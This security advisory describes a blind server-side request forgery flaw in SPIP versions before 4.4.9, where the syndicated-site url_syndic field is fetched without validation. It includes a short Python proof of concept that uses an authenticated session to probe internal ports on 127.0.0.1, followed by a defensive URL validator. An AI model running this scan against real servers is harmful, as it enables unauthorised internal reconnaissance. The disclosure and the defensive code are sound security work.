=============================================================================================================================================
| # Title : SPIP < 4.4.9 Blind SSRF via Syndicated Sites in Private Area |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.spip.net/en_rubrique25.html |
=============================================================================================================================================
[+] Summary : SPIP versions prior to 4.4.9 are vulnerable to a Blind Server-Side Request Forgery (SSRF) issue within the private administration interface.
When an authenticated user edits a syndicated site, the application fails to properly validate the url_syndic parameter. Specifically:
  - The syndication URL is not strictly validated as a legitimate external remote URL.
  - The application accepts arbitrary URLs, including:
      http://127.0.0.1
      internal IP ranges (e.g., 10.x.x.x, 192.168.x.x)
      potentially external attacker-controlled endpoints
  - The server initiates backend HTTP requests to the supplied destination.
Because the response is not returned directly to the attacker, the issue is classified as Blind SSRF. It can nevertheless enable:
  - internal port scanning
  - access to internal services (e.g., databases, cache servers)
  - interaction with cloud metadata services (if applicable)
  - network enumeration through timing or behavioral analysis
Importantly, this vulnerability is not mitigated by the SPIP security screen, meaning the standard protection mechanism does not prevent exploitation.
[+] POC :
import requests

# Private-area endpoint for editing a syndicated site (authenticated)
target_url = "http://target-spip.com/ecrire/?exec=site_edit"
session_cookie = {"spip_session": "your_session_id_here"}
ports_to_scan = [21, 22, 80, 443, 3306, 6379]

for port in ports_to_scan:
    # url_syndic is accepted without validation and fetched server-side
    payload = {
        "url_syndic": f"http://127.0.0.1:{port}",
        "syndication": "oui",
        "modifier": "Enregistrer",
    }
    response = requests.post(target_url, data=payload, cookies=session_cookie)
    print(f"Checking internal port {port}... Status: {response.status_code}")
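As an added defensive example (not SPIP's own code), this is the kind of check the private area should apply to url_syndic before any server-side fetch: only http(s), no embedded credentials, and every address the host resolves to must be public. The function name validate_syndication_url and the injectable resolver parameter are assumptions for illustration; the resolved address must also be pinned for the actual fetch, since a validate-then-fetch sequence that resolves twice can be bypassed by DNS rebinding.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Ranges a syndication fetcher must never contact: loopback, RFC 1918, link-local
# (which includes the 169.254.169.254 cloud metadata address), CGNAT, unspecified,
# multicast, and their IPv6 equivalents.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "169.254.0.0/16", "100.64.0.0/10", "0.0.0.0/8", "224.0.0.0/4",
    "::1/128", "fc00::/7", "fe80::/10", "::/128",
)]


def is_blocked_ip(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    # Unwrap IPv4-mapped IPv6 (::ffff:127.0.0.1) so it hits the IPv4 rules
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return any(addr in net for net in BLOCKED_NETWORKS)


def system_resolve(host: str) -> list:
    # Default resolver; tests pass a stub so the check runs offline
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def validate_syndication_url(url: str, resolver=system_resolve):
    """Return (ok, reason). Accepts only public http(s) destinations."""
    try:
        parts = urlparse(url)
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme not in ("http", "https"):
        return False, f"scheme not allowed: {parts.scheme!r}"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    try:
        ipaddress.ip_address(host)          # literal address: check it directly
        ips = [host]
    except ValueError:                      # hostname: check every resolved address
        try:
            ips = resolver(host)
        except (socket.gaierror, OSError):
            ips = []
    if not ips:
        return False, "host does not resolve"
    for ip in ips:
        if is_blocked_ip(ip):
            return False, f"resolves to non-public address {ip}"
    return True, "ok"
```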
Greetings to :
============================================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)
============================================================================================